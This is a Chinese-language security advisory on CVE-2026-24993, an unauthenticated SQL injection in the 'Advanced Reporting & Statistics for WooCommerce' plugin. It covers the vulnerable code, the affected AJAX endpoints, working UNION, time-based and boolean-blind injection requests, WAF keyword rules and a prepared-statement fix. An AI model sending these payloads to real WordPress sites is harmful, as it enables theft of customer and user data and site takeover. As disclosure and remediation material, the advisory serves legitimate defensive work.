WooCommerce 高级报告与统计 – 订单、产品与客户报告 WordPress插件SQL注入[ CVE-2026-24993 ]
基本信息
| 项目 | 详情 |
|---|---|
| 漏洞编号 | CVE-2026-24993 |
| 插件名称 | Advanced Reporting & Statistics for WooCommerce |
| 受影响版本 | <= 4.1.3 |
| 补丁版本 | 4.1.4 |
| CVSS 3.1 | 7.5(高危) |
| 漏洞类型 | SQL注入(SQL Injection) |
| 利用难度 | 低(无需认证) |
| 危害等级 | 高危 |
漏洞概述
Advanced Reporting & Statistics for WooCommerce 是一款功能强大的 WooCommerce 销售报告和统计分析插件,支持订单、产品、客户、国家、支付方式、运费、税费、退款等多维度数据分析。该插件在 4.1.3 及之前版本中存在多处 SQL 注入漏洞,攻击者可以通过构造恶意的 AJAX 请求,在无需认证的情况下执行任意 SQL 语句,从而窃取数据库敏感信息、篡改数据或完全控制数据库。
漏洞成因
根本原因分析
该漏洞的根本原因在于插件开发者在处理用户输入时,未使用 WordPress 提供的预处理语句机制($wpdb->prepare()),而是直接将用户输入的参数拼接到 SQL 查询字符串中执行。
1. 不安全的 SQL 拼接方式
在helper-class.php文件中,display_orders_by_period()方法存在严重的 SQL 注入漏洞:
publicfunctiondisplay_orders_by_period(){// ...$customer_id=(empty($_POST['customer'])?null:sanitize_text_field(wp_unslash($_POST['customer'])));// HPOS 模式(第 236 行)$query.=" AND orders.customer_id = '{$customer_id}' ";// 传统订单表模式(第 269 行)$query.=" AND meta_customer.meta_value = '{$customer_id}'";$results=$wpdb->get_results($query);}2. 关键问题分析
| 问题 | 说明 |
|---|---|
| 不充分的输入验证 | 仅使用sanitize_text_field()清理输入,该函数用于清理文本内容,不是 SQL 转义函数 |
| 直接字符串拼接 | $customer_id直接拼接到 SQL 语句中,没有任何参数化查询保护 |
| 缺少类型检查 | 未对customer参数进行类型验证或强制转换为整数 |
3. 未授权访问的 AJAX 端点
在helper-class.php文件第 131-132 行,该 AJAX 端点配置了wp_ajax_nopriv_前缀,这意味着任何用户(包括未登录的访客)都可以访问该端点:
add_action('wp_ajax_display_orders_by_period',array($this,'display_orders_by_period'));add_action('wp_ajax_nopriv_display_orders_by_period',array($this,'display_orders_by_period'));4. 其他存在类似问题的端点
| 文件 | AJAX Action | 漏洞参数 | 权限要求 |
|---|---|---|---|
helper-class.php | display_orders_by_period | customer | 无需认证 |
helper-class.php | get_customers | ids | 需要管理员权限 |
helper-class.php | get_countries | ids | 需要管理员权限 |
helper-class.php | get_payments | ids | 需要管理员权限 |
helper-class.php | get_coupons | ids | 需要管理员权限 |
helper-class.php | get_products | ids,product,cat | 需要管理员权限 |
helper-class.php | get_categories | ids,product,cat | 需要管理员权限 |
漏洞影响
1. 数据泄露风险
攻击者可以:
- 获取 WordPress 所有用户的用户名、密码哈希、邮箱地址
- 读取 WooCommerce 订单信息、客户数据、支付详情
- 导出整个数据库内容,包括敏感的客户个人信息
2. 数据篡改风险
攻击者可以:
- 修改管理员密码,接管网站
- 篡改订单数据,修改支付状态或金额
- 删除或损坏重要业务数据
3. 服务器沦陷风险
在特定条件下,攻击者可以:
- 通过 SQL 注入获取服务器 shell(如使用 INTO OUTFILE)
- 在服务器上执行任意命令
- 完全控制目标服务器
漏洞复现
受影响端点
| 端点 | 方法 | 认证要求 |
|---|---|---|
/wp-admin/admin-ajax.php | POST | 无需认证(action=display_orders_by_period) |
/wp-admin/admin-ajax.php | POST | 需要管理员权限(action=get_customers) |
/wp-admin/admin-ajax.php | POST | 需要管理员权限(action=get_products) |
复现步骤
验证漏洞存在(UNION 注入)
POST /wp-admin/admin-ajax.php HTTP/1.1 Host: 127.0.0.1 Content-Type: application/x-www-form-urlencoded action=display_orders_by_period&customer=' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x6e75636c65692d73716c692d74657374,VERSION(),0x6e75636c65692d73716c692d74657374)-- -验证漏洞存在(时间盲注)
POST /wp-admin/admin-ajax.php HTTP/1.1 Host: 127.0.0.1 Content-Type: application/x-www-form-urlencoded action=display_orders_by_period&customer='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-如果响应延迟约 6 秒,则确认存在 SQL 注入漏洞。
布尔盲注验证
# 条件为真,返回正常数据 POST /wp-admin/admin-ajax.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded action=display_orders_by_period&customer='+AND+1=1--+- # 条件为假,返回异常或无数据 POST /wp-admin/admin-ajax.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded action=display_orders_by_period&customer='+AND+1=2--+-修复建议
1. 立即升级
强烈建议所有用户立即升级到 4.1.4 或更高版本,官方已在该版本中修复了此漏洞。
2. 临时缓解措施(无法立即升级时)
如果暂时无法升级,可以通过以下方式缓解风险:
方法1:使用 WAF 规则拦截
在 Web 应用防火墙(WAF)中添加规则,拦截包含 SQL 关键字的请求:
- 监控路径:/wp-admin/admin-ajax.php - 监控参数:action=display_orders_by_period - 拦截关键词:UNION、SELECT、INSERT、UPDATE、DELETE、DROP、SLEEP、BENCHMARK - 拦截特殊字符:单引号、分号、注释符(--、/*、*/)方法2:禁用未授权访问(临时方案)
在主题的functions.php中添加以下代码,移除未授权的 AJAX 端点:
add_action('wp_ajax_nopriv_display_orders_by_period',function(){wp_die('Unauthorized','Unauthorized',['response'=>403]);},1);3. 代码修复方案
正确的修复方式应该是使用预处理语句:
publicfunctiondisplay_orders_by_period(){// ...$customer_id=(empty($_POST['customer'])?null:intval(wp_unslash($_POST['customer']))// 强制转换为整数);if($customer_id){$query.=$wpdb->prepare(" AND orders.customer_id = %d ",$customer_id);}// ...}或对于需要字符串参数的情况:
if($customer_id){$query.=$wpdb->prepare(" AND orders.customer_id = %s ",$customer_id);}免责声明
本报告仅供安全研究和授权测试使用。未经授权对他人系统进行安全测试属于违法行为,请遵守相关法律法规。使用本报告中的信息所造成的任何后果,与报告作者无关。